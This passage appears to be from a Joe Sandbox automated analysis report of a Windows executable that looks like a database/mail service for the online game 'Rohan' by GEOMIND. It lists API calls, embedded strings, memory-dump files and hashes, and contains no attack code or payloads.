                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_JoinRank](?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)}
                                                                                      • API String ID: 0-2937254977
                                                                                      • Opcode ID: 0cc9737caff737c0f224ecae33e8134abb46b40539ac14d656aa28de37c5d73d
                                                                                      • Instruction ID: 82d5f988c0dffaa49dc845c783df24b28e2ad7cf0c4a8bb33f88942f73bc95b2
                                                                                      • Opcode Fuzzy Hash: 0cc9737caff737c0f224ecae33e8134abb46b40539ac14d656aa28de37c5d73d
                                                                                      • Instruction Fuzzy Hash: 7CD1E4F06822157BFBA49B54CC52F996335EB84B18F208288F71D7F2C5D5B1B9808B6C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_SendMail](?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)},000000FD), ref: 0043EB35
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043EB74
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043EBAC
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000014,00000000,?,00000015,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043EBE4
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000032,00000000,?,00000033,00000000,?,00000000,00000001,00000001,0000000C,00000014), ref: 0043EC1C
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000200,00000000,?,00000201,00000000,?,00000000,00000001,00000001,0000000C,00000032), ref: 0043EC5A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,00000001,0000000C,00000200), ref: 0043EC94
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E7,000000FB,00000000), ref: 0043ECCF
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043ED0A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043ED44
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043ED7F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043EDBA
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043EDF4
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043EE2F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043EE6A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043EEA4
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043EEDF
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043EF1A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043EF4F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043EF8A
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_SendMail](?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)}, xrefs: 0043EB2C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_SendMail](?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)}
                                                                                      • API String ID: 0-4284022410
                                                                                      • Opcode ID: 90d4f783b688decb74e9aa0de848d14c2c31665137923b9f0efd2789b84d4203
                                                                                      • Instruction ID: 68838bb82e71aa133f2b96d03d901a16bc0b95bf1a41b074374fa640602bd21d
                                                                                      • Opcode Fuzzy Hash: 90d4f783b688decb74e9aa0de848d14c2c31665137923b9f0efd2789b84d4203
                                                                                      • Instruction Fuzzy Hash: EBD1F0B46842197BFB289B64CC52FE96335EB89B18F50C188F7287E3C5D5B26D408F58
                                                                                      APIs
                                                                                      • SuspendThread.KERNEL32(0045F260), ref: 0045F2CB
                                                                                      • GetThreadContext.KERNEL32(0045F260,00010007), ref: 0045F2F5
                                                                                        • Part of subcall function 0045E040: wvsprintfA.USER32(?,?,?), ref: 0045E068
                                                                                        • Part of subcall function 0045E040: lstrlenA.KERNEL32(?,?,00000000), ref: 0045E082
                                                                                        • Part of subcall function 0045E040: WriteFile.KERNEL32(?,?,00000000), ref: 0045E094
                                                                                        • Part of subcall function 0045E5E0: wsprintfA.USER32 ref: 0045E695
                                                                                        • Part of subcall function 0045E5E0: wsprintfA.USER32 ref: 0045E6B6
                                                                                      • GetCurrentProcess.KERNEL32(0045F260,?,00010007,00000000,000E00B0,000E00CA,00000000), ref: 0045F499
                                                                                      • ResumeThread.KERNEL32(0045F260), ref: 0045F6AE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: Thread$wsprintf$ContextCurrentFileProcessResumeSuspendWritelstrlenwvsprintf
                                                                                      • String ID: %08x %08x $Call Stack:$Registers:$Stack dump:$%s %d %s$%s %s$%s +%x$EAX=%08x CS=%04x EIP=%08x EFLGS=%08x$EBX=%08x SS=%04x ESP=%08x EBP=%08x$ECX=%08x DS=%04x ESI=%08x FS=%04x$EDX=%08x ES=%04x EDI=%08x GS=%04x$Params: %08x %08x %08x %08x
                                                                                      • API String ID: 2091159764-468319004
                                                                                      • Opcode ID: 9528dd19231f9523530c8f6e359f33e5cb3dc8bff483969fb56fd1686be77964
                                                                                      • Instruction ID: 5cefceb673f22b6fdef9744cb7059bec8de4706fd6f0c29012cbaecf74cac1f2
                                                                                      • Opcode Fuzzy Hash: 9528dd19231f9523530c8f6e359f33e5cb3dc8bff483969fb56fd1686be77964
                                                                                      • Instruction Fuzzy Hash: D0B16FB5A00218ABDB54DF54CC45FAE73B8EB48704F0085DDB50DA7292DB78AE84CF99
                                                                                      APIs
                                                                                      • GetSystemInfo.KERNEL32(?,DBConfig.txt), ref: 0045AA19
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoSystem
                                                                                      • String ID: %s on port %d (time stamp: %02d/%02d/%02d %02d:%02d:%02d)$DBConfig.txt$Event$MailFrom$MailServer$MailTo$NumberOfThreads1$ODBC$SubNet$System$Title
                                                                                      • API String ID: 31276548-1337846954
                                                                                      • Opcode ID: 38568d278f1a472bbf65057f1d480ca059bc78a175e69b38c1dda11c808ce571
                                                                                      • Instruction ID: 7db58e61a5bbac3307df5f705467a0e928025fe9932649aa63b478b138c95e0d
                                                                                      • Opcode Fuzzy Hash: 38568d278f1a472bbf65057f1d480ca059bc78a175e69b38c1dda11c808ce571
                                                                                      • Instruction Fuzzy Hash: 3802D3B4A006289FCB64DF14CC94BAAB7B5BF48305F1441EAE90DA7351DA34AF84CF59
                                                                                      APIs
                                                                                      • MessageBoxA.USER32(00000000,Online RPG Rohan Service by GEOMINDshwon@geomind.co.krUsage : [/n service_name][/r registrykey_name][/d display_name] /(command) Command : /i - Install Service /u - Uninstall Service /?/h - This Help,00000000,00000000), ref: 0046A8E5
                                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000104,00000000), ref: 0046AA25
                                                                                      • MessageBoxA.USER32(00000000,Service Installed !,00000000,00000000), ref: 0046AA5E
                                                                                      • MessageBoxA.USER32(00000000,Install Failed !,00000000,00000000), ref: 0046AA73
                                                                                      • MessageBoxA.USER32(00000000,Service Uninstall !,00000000,00000000), ref: 0046AA9A
                                                                                      • MessageBoxA.USER32(00000000,Uninstall Failed !,00000000,00000000), ref: 0046AAAF
                                                                                      Strings
                                                                                      • SERVER=%s;, xrefs: 0046AAF6
                                                                                      • UID=%s;, xrefs: 0046AB14
                                                                                      • -/=, xrefs: 0046A700
                                                                                      • Service Uninstall !, xrefs: 0046AA93
                                                                                      • DATABASE=%s;, xrefs: 0046AB50
                                                                                      • DRIVER={SQL Server};, xrefs: 0046AADC
                                                                                      • Online RPG Rohan Service by GEOMINDshwon@geomind.co.krUsage : [/n service_name][/r registrykey_name][/d display_name] /(command) Command : /i - Install Service /u - Uninstall Service /?/h - This Help, xrefs: 0046A8DE
                                                                                      • 6, xrefs: 0046A7DF
                                                                                      • PWD=%s;, xrefs: 0046AB32
                                                                                      • Install Failed !, xrefs: 0046AA6C
                                                                                      • h\L, xrefs: 0046AA42
                                                                                      • Uninstall Failed !, xrefs: 0046AAA8
                                                                                      • Service Installed !, xrefs: 0046AA57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$FileModuleName
                                                                                      • String ID: -/=$6$DATABASE=%s;$DRIVER={SQL Server};$Install Failed !$Online RPG Rohan Service by GEOMINDshwon@geomind.co.krUsage : [/n service_name][/r registrykey_name][/d display_name] /(command) Command : /i - Install Service /u - Uninstall Service /?/h - This Help$PWD=%s;$SERVER=%s;$Service Installed !$Service Uninstall !$UID=%s;$Uninstall Failed !$h\L
                                                                                      • API String ID: 268639884-3372089525
                                                                                      • Opcode ID: e5534ec78f32a6cb08410e0709ce121ec003ab1b4f878db7a8cfcb3b4ea36730
                                                                                      • Instruction ID: 57e4d1ad423b4a2c91f211ad3546cfb5237aefa16c603939ea95adce8e192369
                                                                                      • Opcode Fuzzy Hash: e5534ec78f32a6cb08410e0709ce121ec003ab1b4f878db7a8cfcb3b4ea36730
                                                                                      • Instruction Fuzzy Hash: C2D159B0D04258DFDB14DF90CC95BEEBBB0AF48305F10409AE5097B281E7795A99CFA6
                                                                                      APIs
                                                                                        • Part of subcall function 004143B0: _Yarn.LIBCPMTD ref: 004143C0
                                                                                        • Part of subcall function 004143B0: _Yarn.LIBCPMTD ref: 0041441B
                                                                                        • Part of subcall function 004143B0: _Yarn.LIBCPMTD ref: 00414476
                                                                                        • Part of subcall function 004143B0: _Yarn.LIBCPMTD ref: 004144D1
                                                                                        • Part of subcall function 004143B0: _Yarn.LIBCPMTD ref: 0041452C
                                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0041335B
                                                                                      • _strrchr.LIBCMT ref: 0041336A
                                                                                      • std::bad_exception::~bad_exception.LIBCMTD ref: 004135FB
                                                                                      • std::bad_exception::~bad_exception.LIBCMTD ref: 00413687
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: Yarn$std::bad_exception::~bad_exception$FileModuleName_strrchr
                                                                                      • String ID: /%Y%m%d-%H%M%S db_packet.log$C:\Epoch\Log$GameDB$Gamenet$Geomind$LogDir$LoginDB$UpdateBlockCharName failed$XVN$_init.log$connect to gamedb successfully$connect to logindb successfully$test
                                                                                      • API String ID: 4059002796-2421602583
                                                                                      • Opcode ID: ef3bc0b17ce779802afd5a432197613e6624cfe9a85cbf2ec5459931c53f0358
                                                                                      • Instruction ID: 6899fe0220de9930e907ee96a211994e5c46495b74c72dc121c4b79c05c0b377
                                                                                      • Opcode Fuzzy Hash: ef3bc0b17ce779802afd5a432197613e6624cfe9a85cbf2ec5459931c53f0358
                                                                                      • Instruction Fuzzy Hash: C5A18CB49042289BCB64EF61DC42FDAB770AF44309F1041DEE5096A281EBB96FC4CF59
                                                                                      APIs
                                                                                      • GetDC.USER32(?), ref: 00411263
                                                                                      • GetTextMetricsA.GDI32(?,?), ref: 0041127D
                                                                                      • ReleaseDC.USER32(?,?), ref: 004112A6
                                                                                      • GetClientRect.USER32(?,?), ref: 004112D0
                                                                                      • SetScrollInfo.USER32(?,00000001,0000001C,00000001), ref: 00411334
                                                                                      • SetScrollInfo.USER32(?,00000000,0000001C,00000001), ref: 0041138F
